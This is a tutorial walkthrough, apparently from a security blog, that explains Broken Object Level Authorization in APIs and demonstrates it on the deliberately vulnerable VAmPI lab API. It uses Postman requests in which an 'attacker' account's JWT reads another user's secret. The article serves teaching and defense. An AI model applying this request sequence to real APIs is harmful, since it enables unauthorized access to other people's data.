**Note: The content in this article is only for educational purposes and understanding of cybersecurity concepts. It should enable people and organizations to have a better grip on threats and know how to protect themselves against them. Please use this information responsibly.**
Broken Object Level Authorization (BOLA) is a critical vulnerability in APIs that occurs when an application allows unauthorized access to objects (such as records, data entries, or resources). This issue arises when the API fails to properly enforce user-level permissions, allowing users to access or manipulate data belonging to other users without appropriate authorization checks.
How BOLA Occurs: APIs often expose endpoints that interact with sensitive data, and these endpoints typically use object identifiers (IDs) to retrieve specific records. If the API only relies on these IDs and lacks robust authorization mechanisms, an attacker can manipulate the ID in API requests to access or modify objects that belong to other users.
Before the walkthrough, install VAmPI and Postman. If you have not already installed them, you can use the links below:
1. Understanding and Installing VAmPI – A Vulnerable REST API (Part 1) – Stratos Ally
2. Installing Postman: An API testing tool – Stratos Ally
Walkthrough of BOLA in VAmPI
- Register and log in as Edward and Obtain JWT
a) Register as Edward: /users/v1/register
b) Log in as Edward: /users/v1/login
Capture the JWT from the response.
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MjIyMjgxODMsImlhdCI6MTcyMjIyODEyMywic3ViIjoiZWR3YXJkIn0.oh-CmJNYsucWVT5feVZrYyqnIpwkYSr5tdIw-J-lrM8
c) Store Edward’s JWT in Postman:
Save the JWT as a collection variable in Postman for easy access.
Example variable name: edward_jwt.
d) You can also use this bearer token for each request in the collection.
- Create a New Book as Edward
Endpoint: POST /books/v1
Authorization: Bearer {{edward_jwt}}
Body:
{
“book_title”: “Edward’s Book”,
“secret”: “Edward’s Secret”
}
Send the request:
Verify that the book is created successfully.
- Retrieve All Books
Endpoint: GET /books/v1
Authorization: Bearer {{edward_jwt}}
Send the request:
Observe that the response lists all books in the database.
Note that the “secret” field is not displayed.
- Understand Access Control Requirements
According to the readme file in the VAmPI GitHub repository, each book is unique to its owner.
Only the owner should be able to view the secret.
Endpoint: GET /books/v1/Edward’s Book
- Retrieve Book Details of Edwards Using Another User’s JWT (Attacker)
a) Register as Attacker: /users/v1/register
{
“username”: “attacker”,
“password”: “attacker”,
“email”: “attacker@gmail.com”
}
b) Log in as Attacker: /users/v1/login
Capture the JWT from the response.
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MjIyMzAwOTIsImlhdCI6MTcyMjIzMDAzMiwic3ViIjoiYXR0YWNrZXIifQ.U8dMhwGO3_gkbNf8yYYxzam7dbiubPMpl0WdgRbgqWU
c) Store Edward’s JWT in Postman:
Save the JWT as a collection variable in Postman for easy access.
Variable name: attacker_jwt.
d) Update the Authorization tab in the collection to use {{attacker_jwt}}.
e) Endpoint: /books/v1/Edward’s Book
Send the request:
Observe that the response includes the book’s title, the submitting user, and the secret.
We successfully exploited a BOLA vulnerability where a user Attacker, who should not have access, could view Edward’s book details, including the secret. This type of vulnerability arises when access controls are not properly enforced, thus allowing unauthorized users to access restricted data.
